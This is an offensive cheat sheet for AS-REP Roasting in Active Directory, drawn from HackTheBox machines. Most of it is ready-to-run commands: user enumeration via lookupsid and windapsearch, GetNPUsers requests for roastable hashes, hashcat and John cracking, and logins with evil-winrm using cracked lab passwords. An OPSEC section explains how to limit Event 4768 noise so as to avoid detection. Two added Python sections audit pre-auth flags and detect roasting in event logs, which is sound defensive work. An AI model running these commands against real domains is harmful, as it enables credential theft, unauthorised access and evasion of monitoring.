AS-REP Roasting

# Overview

AS-REP Roasting targets user accounts that have Kerberos pre-authentication disabled (the UF_DONT_REQUIRE_PREAUTH flag in userAccountControl). The attacker sends an AS-REQ for such an account to the Key Distribution Center (KDC) and, because no pre-authentication is demanded, receives an AS-REP whose encrypted part is protected by a key derived from the user's password (for RC4, encryption type 23, that key is the user's NT hash). The encrypted part can be cracked offline. The attack requires only a list of valid usernames, which makes it one of the first things tried after user enumeration.

# Prerequisites

  • Network access to the Domain Controller (KDC) on port 88
  • A list of valid domain usernames (from lookupsid, ldapsearch, or OSINT)
  • No domain credentials required

# Detection & Enumeration

# Step 1: Obtain User List

```bash
# Method A: RID cycling via lookupsid (if SMB null session or guest access)
# -no-pass: attempt anonymous/guest authentication
# 10000: enumerate RIDs up to 10000 (default is 4000)
lookupsid.py guest@10.10.10.192 -no-pass 10000
# Keep only user objects and strip the "DOMAIN\" prefix and the "(SidTypeUser)" suffix
lookupsid.py guest@10.10.10.192 -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt

# Method B: Anonymous LDAP bind + windapsearch
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
# -U: enumerate all user objects
# Anonymous bind is tested automatically when no credentials are provided

# Method C: Authenticated LDAP (if credentials exist)
# The bitwise filter (matching rule 1.2.840.113556.1.4.803) excludes disabled accounts (UAC bit 0x2)
ldapsearch -x -H 'ldap://10.10.10.100' -D 'user' -w 'pass' -b "dc=domain,dc=local" \
  "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName

# Method D: netexec user enumeration
netexec smb 10.10.11.35 -u 'guest' -p '' --users
```

# Step 2: Identify Pre-Auth Disabled Accounts

```bash
# Bulk AS-REP roast against a user list
# -dc-ip: domain controller IP
# -no-pass: no password supplied (anonymous request)
# -usersfile: file containing one username per line
GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.192

# Filter out noise — KDC_ERR_C_PRINCIPAL_UNKNOWN means user doesn't exist
GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.192 | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'

# Request ticket for a specific known user
GetNPUsers.py egotistical-bank.local/fsmith -request -no-pass -dc-ip 10.10.10.175

# Authenticated mode: with valid credentials GetNPUsers first queries LDAP for
# accounts flagged UF_DONT_REQUIRE_PREAUTH and then requests their AS-REPs
impacket-GetNPUsers domain.local/user:password -request -dc-ip 10.10.10.10
# -request: print each retrieved AS-REP in hashcat/John format
# Note: -request does not change how the tool authenticates; the LDAP bind above
# uses NTLM unless Kerberos authentication is selected with -k, which matters
# where NTLM is monitored or disabled

# Loop through a list of usernames (one by one)
while read -r p; do
  GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.10.10.175 >> hash.txt
done < unames.txt
```

# Step 3: Common Service Account Naming Patterns

Pre-auth is typically disabled for service accounts that use legacy applications:

  • svc-* (e.g., svc-alfresco, svc_apache)
  • *svc (e.g., SQLSvc, SVC_TGS)
  • Application-specific: alfresco, exchange, sap, oracle
  • Scan results or LDAP enumeration may reveal specific service names

# Exploitation / Execution

# Hash Cracking

```bash
# Hashcat — mode 18200 (Kerberos 5 AS-REP etype 23)
hashcat -m 18200 hash.txt -o pass.txt /usr/share/wordlists/rockyou.txt --force
# Mode 18200: AS-REP etype 23 (RC4-HMAC)

# John the Ripper
john hash --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt
# --format=krb5asrep: Kerberos 5 AS-REP for both RC4 and AES tickets

# John with fork for speed
john hash --fork=4 -w=/usr/share/wordlists/rockyou.txt
```

# Hash Identification

The output from GetNPUsers looks like:

```text
$krb5asrep$23$svc-alfresco@HTB.LOCAL:fef58ddc72bde86138c79baa53e3f340$9ccf...
```

  • $23$: RFC 3961 encryption type 23 (RC4-HMAC)
  • $18$: AES256-CTS-HMAC-SHA1-96 (John can also crack these)

# Post-Crack Authentication

```bash
# Test credentials with various services
netexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
netexec winrm 10.10.10.192 -u svc-alfresco -p 's3rvice'

# WinRM shell
evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'

# Kerberos TGT-based authentication
getTGT.py -dc-ip dc01.htb.local htb.local/svc-alfresco -hashes :<NT_HASH>
export KRB5CCNAME=svc-alfresco.ccache
```

# Targeted vs Bulk AS-REP Roasting

| Approach | Description | OPSEC Impact |
|---|---|---|
| Bulk | Run GetNPUsers against all known users | High: generates many 4768 events |
| Targeted | Only test users likely to have pre-auth disabled | Low: fewer requests, less noise |
| Authenticated | Use valid creds to query UF_DONT_REQUIRE_PREAUTH via LDAP first | Medium: LDAP query is logged |

Authenticated pre-screening:

```bash
# Query which users have pre-auth disabled via LDAP
GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
# Look for accounts with specific UAC flags

# Using bloodhound-python, pre-auth disabled users appear in node properties
bloodhound-python -d domain -u user -p pass -dc dc -c all -ns 10.10.10.10
```
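As an added example (not code from the original page or from Impacket), the following Python builds the LDAP bitwise filter that the authenticated pre-screening step relies on and audits userAccountControl values for the UF_DONT_REQUIRE_PREAUTH bit, which is the same flag the GetADUsers and BloodHound checks above look for. The user records are constructed sample data.

```python
# Added example, not from the original page: audit userAccountControl (UAC) values
# for the UF_DONT_REQUIRE_PREAUTH bit and build the LDAP filter that finds such
# accounts. The user records below are constructed sample data.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000   # decimal 4194304

# 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND: true if all mask bits are set
BIT_AND = "1.2.840.113556.1.4.803"

def bit_and_filter(mask: int, negate: bool = False) -> str:
    """Build a userAccountControl bitwise-AND filter clause for the given mask."""
    clause = f"(userAccountControl:{BIT_AND}:={mask})"
    return f"(!{clause})" if negate else clause

def preauth_disabled_filter() -> str:
    """Enabled user objects that do not require Kerberos pre-authentication."""
    return ("(&(objectCategory=person)(objectClass=user)"
            + bit_and_filter(UF_DONT_REQUIRE_PREAUTH)
            + bit_and_filter(UF_ACCOUNTDISABLE, negate=True) + ")")

def matches_bit_and(uac: int, mask: int) -> bool:
    """Local equivalent of the matching rule: every bit of mask is set in uac."""
    return uac & mask == mask

# Constructed sample: (sAMAccountName, userAccountControl)
SAMPLE_USERS = [
    ("svc-alfresco", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    ("jdoe", UF_NORMAL_ACCOUNT),
    ("oldsvc", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE),
    ("backup-admin", UF_NORMAL_ACCOUNT | 0x10000),   # DONT_EXPIRE_PASSWD only
]

def audit(users):
    """Names of enabled accounts exposed to AS-REP roasting (disabled ones skipped)."""
    return [name for name, uac in users
            if matches_bit_and(uac, UF_DONT_REQUIRE_PREAUTH)
            and not matches_bit_and(uac, UF_ACCOUNTDISABLE)]

def remediated_uac(uac: int) -> int:
    """UAC value to write back once the application no longer needs the exemption."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH
```

The generated filter string can be passed verbatim to ldapsearch in place of the filter shown in Method C above.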

# Important: impacket-GetNPUsers -no-preauth flag

```text
# Only the ThePorgs fork of impacket supports -no-preauth for pre-auth user enumeration
# Main branch impacket does NOT support this flag
# Install ThePorgs fork: pip install impacket  (current pip version IS ThePorgs fork)
# Verify: impacket-GetNPUsers -h | grep -i preauth
```

# Common Pitfalls

  • Hash not crackable: The password is strong and not in wordlists. Consider longer wordlists, rules, or keyboard walks.
  • All users return KDC_ERR: Kerberos may not be reachable or the domain name is incorrect. Verify with nmap -p88 <DC> and check /etc/hosts.
  • Clock skew: Kerberos requires client clock within 5 minutes of DC clock. Use sudo ntpdate -u <DC> before Kerberos operations.
  • Empty results on valid users: The -usersfile file may contain extra whitespace. Use sed -i 's/ //g' users.txt to clean.

# OPSEC Considerations

  • Each AS-REQ generates Windows Event ID 4768 (Kerberos TGT requested) on the DC
  • Bulk roasting generates many rapid 4768 events — consider throttling or targeted approach
  • Pre-auth disabled is also flagged by tools like PingCastle and Microsoft Defender for Identity
  • After obtaining credentials, prefer using BloodHound for further enumeration rather than noisy LDAP/SMB queries
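The 4768 indicators listed above, as an added detection example that is not part of the original page: the script parses constructed sample event records (time, TargetUserName, IpAddress, PreAuthType, TicketEncryptionType, Status), flags successful TGT requests made without pre-authentication, and reports client addresses that produced a burst of 4768 events, with the share of KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) responses that indicates username guessing.

```python
# Added example, not from the original page: flag AS-REP roasting indicators in
# Windows Security event 4768 records. The log lines are constructed samples with
# the fields time|TargetUserName|IpAddress|PreAuthType|TicketEncryptionType|Status.
from collections import defaultdict
from datetime import datetime

SAMPLE_4768 = """\
2024-05-01T09:00:00|jdoe|10.10.14.5|2|0x12|0x0
2024-05-01T09:00:01|alice|10.10.14.5|0|0x17|0x6
2024-05-01T09:00:01|bob|10.10.14.5|0|0x17|0x6
2024-05-01T09:00:01|svc-alfresco|10.10.14.5|0|0x17|0x0
2024-05-01T09:00:02|carol|10.10.14.5|0|0x17|0x6
2024-05-01T09:00:02|dave|10.10.14.5|0|0x17|0x6
2024-05-01T09:00:03|erin|10.10.14.5|0|0x17|0x6
2024-05-01T09:05:00|jdoe|10.10.20.8|2|0x12|0x0
"""

def parse_events(text):
    events = []
    for line in text.splitlines():
        ts, user, ip, preauth, etype, status = line.split("|")
        events.append({"time": datetime.fromisoformat(ts), "user": user, "ip": ip,
                       "preauth": int(preauth), "etype": int(etype, 16),
                       "status": int(status, 16)})
    return events

def roastable_requests(events):
    """Successful TGT requests made without pre-authentication (PreAuthType 0,
    Status 0x0): the AS-REP returned to that client is offline-crackable."""
    return [(e["user"], e["ip"], e["etype"]) for e in events
            if e["preauth"] == 0 and e["status"] == 0]

def enumeration_sources(events, window_s=60, threshold=5):
    """Client IPs with >= threshold 4768 events inside window_s seconds.
    Returns {ip: (events_in_window, count of KDC_ERR_C_PRINCIPAL_UNKNOWN 0x6)}."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            window = [e for e in evs[i:]
                      if (e["time"] - first["time"]).total_seconds() <= window_s]
            if len(window) >= threshold:
                hits[ip] = (len(window), sum(e["status"] == 0x6 for e in window))
                break
    return hits
```

Feed real exported 4768 records by adapting parse_events to your SIEM's field names; PreAuthType 0 on a successful request is the single highest-value signal, since it fires even for a targeted, low-volume roast.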

# Post-Exploitation Value

  • Initial foothold credentials — most common outcome
  • The cracked account may be a service account with elevated privileges (e.g., svc-alfresco in Forest was in Account Operators)
  • Service accounts often have WinRM access for remote management
  • The account can be used for BloodHound ingestion and Kerberoasting

# Cross-References

# Tool References

| Tool | Link |
|---|---|
| Impacket (GetNPUsers) | https://github.com/fortra/impacket |
| hashcat | https://hashcat.net/hashcat/ |
| John the Ripper | https://github.com/openwall/john |
| windapsearch | https://github.com/ropnop/windapsearch |

# Source Machines

  • Blackfield (Hard) — support user via AS-REP -> bloodhound -> LSASS dump -> Backup Operators -> NTDS dump
  • Forest (Easy) — svc-alfresco via AS-REP -> Account Operators -> Exchange Windows Permissions -> DCSync
  • Sauna (Easy) — fsmith via AS-REP -> WinPEAS autologon -> svc_loanmgr -> DCSync
  • Rebound (Insane) — jjones via AS-REP -> pre-auth Kerberoasting -> ldap_monitor password